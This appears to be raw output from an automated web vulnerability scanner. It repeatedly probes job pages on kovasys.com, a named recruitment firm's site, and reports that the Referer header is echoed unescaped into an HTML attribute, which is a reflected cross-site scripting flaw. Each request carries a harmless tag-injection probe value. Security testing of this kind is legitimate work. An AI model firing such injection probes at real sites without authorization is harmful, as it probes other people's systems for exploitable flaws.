GET /tabid/91/jobid/850/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: bd793"><a>a612ce35013
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:35:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45796
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|850~ref|bd793"><a>a612ce35013 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a3b"><a>12940f74435 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/851/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 97a3b"><a>12940f74435
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:35:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49052
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|851~ref|97a3b"><a>12940f74435 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be9f"><a>549d7e1dc13 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/852/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 4be9f"><a>549d7e1dc13
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:35:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48191
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|852~ref|4be9f"><a>549d7e1dc13 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617ee"><a>177cefd5bc0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/853/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 617ee"><a>177cefd5bc0
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:35:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 51191
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|853~ref|617ee"><a>177cefd5bc0 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1f1f"><a>2c45f7c37b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/854/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: f1f1f"><a>2c45f7c37b9
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48729
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|854~ref|f1f1f"><a>2c45f7c37b9 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d965"><a>b7b0ddae4f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/855/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 5d965"><a>b7b0ddae4f5
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46893
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|855~ref|5d965"><a>b7b0ddae4f5 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f07c"><a>17513adaa33 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/856/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 4f07c"><a>17513adaa33
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44391
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|856~ref|4f07c"><a>17513adaa33 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f749"><a>f28e19cc4bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/857/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 1f749"><a>f28e19cc4bc
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44045
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Toronto IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|857~ref|1f749"><a>f28e19cc4bc "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da7ab"><a>335bde309d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/859/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: da7ab"><a>335bde309d7
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47536
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|859~ref|da7ab"><a>335bde309d7 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c06dc"><a>aab869d6100 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/860/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: c06dc"><a>aab869d6100
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49315
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|860~ref|c06dc"><a>aab869d6100 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdbc8"><a>5dd1910979e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/861/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: cdbc8"><a>5dd1910979e
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49699
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|861~ref|cdbc8"><a>5dd1910979e "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4f00"><a>730414fa103 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/862/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: a4f00"><a>730414fa103
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:34:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46792
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|862~ref|a4f00"><a>730414fa103 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a63c"><a>2520ede9708 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/863/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: 1a63c"><a>2520ede9708
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:33:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 50113
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Montreal IT Recruitment Firm, ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|863~ref|1a63c"><a>2520ede9708 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a96a7"><a>477891686b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /tabid/91/jobid/864/language/en-US/Default.aspx HTTP/1.1 Host: www.kovasys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=123583761.1290654037.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=123583761.287148314.1290654037.1290654037.1290654037.1; language=en-US; __utmc=123583761; __qca=P0-2020709338-1290654036640; __utmb=123583761; .ASPXANONYMOUS=ogD3xN7CywEkAAAAMzZlZTIxYWMtMTU4Ni00ZGY5LWI1YTYtOWM3MmFmOWRjMTlk0; Referer: a96a7"><a>477891686b8
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:33:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 55036
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"><meta id="MetaDescription" name="DESCRIPTION" content="Kovasys Inc., Sherbrooke IT Recruitment Fir ...[SNIP]... <a href="http://www.kovasys.com/Default.aspx?&tabid=143&vp_url=http://www.kovasysjobs.com/cats/careers/index.php?m|careers~p|candidateRegistration~ID|864~ref|a96a7"><a>477891686b8 "> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdc31"><a>bd65bee1256 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
